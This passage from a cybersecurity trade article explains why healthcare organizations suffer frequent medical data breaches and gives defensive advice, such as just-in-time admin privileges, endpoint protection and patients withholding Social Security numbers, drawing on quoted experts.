What Makes Healthcare Data Vulnerable to Attack?
Gary Cantrell, head of investigation at the Department of Health and Human Services Office of the Inspector General, told CBS that medical identity theft is something he sees often. Last year, the agency dealt with roughly 400 reported cases of medical data breaches. Some of that data ended up for sale on the darknet.
Despite knowing data has been compromised, investigators don’t always know how or when it will be used, Cantrell says.
Kellermann argues there’s a reason why these breaches occur in healthcare so often: The industry has some of the worst cybersecurity practices worldwide.
“Organizations are far too reliant on firewalls and encryption, neither of which can stop modern-day cyberattacks,” Kellermann says. “The big challenge with the entire governance of the healthcare sector with regards to cybersecurity, is that there are physicians who run the board, who run various departments. And these folks are very astute when it comes to medical knowledge but not quite prepared to handle the risks of IT and IT deployment.
“When they're deploying IT left and right with mobility, Software as a Service and cloud, and yet only protecting it with encryption, they leave themselves wide open to attack.”
Just as patients who walk into a physician’s office or a hospital should expect a clean, safe environment, they should have the same expectations for the facility’s digital landscape.
Says Kellermann: “The irony here is that these digital transformation efforts are spreading virtual disease, which in the long-term not only inhibits operations, it causes this phenomenon I would call digital disease among customers — where their identities are stolen, and they are extorted because their personal information has been released.”
How to Minimize the Possibility of Stolen Medical Data
For patients, the consequences of having their protected health information stolen, sold and used to create fake claims in their name can be violating and have a major impact on their future care decisions. When healthcare organizations fail to protect patient data, they risk losing the trust of their patients and, ultimately, their reputation.
A constant evaluation of security practices has become imperative for healthcare organizations hoping to avoid the possibility of a breach. Introducing practices such as application control and privileged access management can help organizations take a step in the right direction, protecting their data in ways where basic encryption might fall short.
“Administrators shouldn't have administrative privileges at all times,” says Kellermann. “Even though they’re administrators, they should only have just-in-time administration for a specific purpose or use. Hackers are very smart, and they’ll target all administrators and superuser accounts when they go after an infrastructure because they know those people have the keys to the castle.”
The most important data for an organization, however, is often collected and delivered by endpoints. Moreover, this is where breaches are most likely to happen due to their contact with users — typically seen as a “weak link” in an organization’s security strategy — and the ever-increasing number of Internet of Things devices being added to networks.
Having an endpoint protection platform is critical for security teams to take an active role in combatting cyberattacks. Effective defense, Kellermann notes, should have three things:
“It should have behavioral anomaly detection,” he says. “It should be able to capture all the data or all of the phenomenon that’s occurring on an endpoint and allow you to store that so you can look back in time to understand the root cause of that of that criminal activity. And it should have the capacity to have an open API so you can connect to other security controls or mechanisms that you have that predate your modernization efforts, or postdate it for that matter.”
Still, security practices only work if everyone is on board. It’s important for all healthcare staff to receive regular security awareness training to help stop cyberattacks before they happen. Healthcare employees are almost as likely to report an incident as internal security teams.
As for patients hoping to increase their own personal security, Kellermann offers the following advice: Keep your data close.
“When you enter a new facility or a new physician's office, you're not required by law to provide your Social Security number, so don't,” he says. “Start there, and basically minimize the information you're putting out.”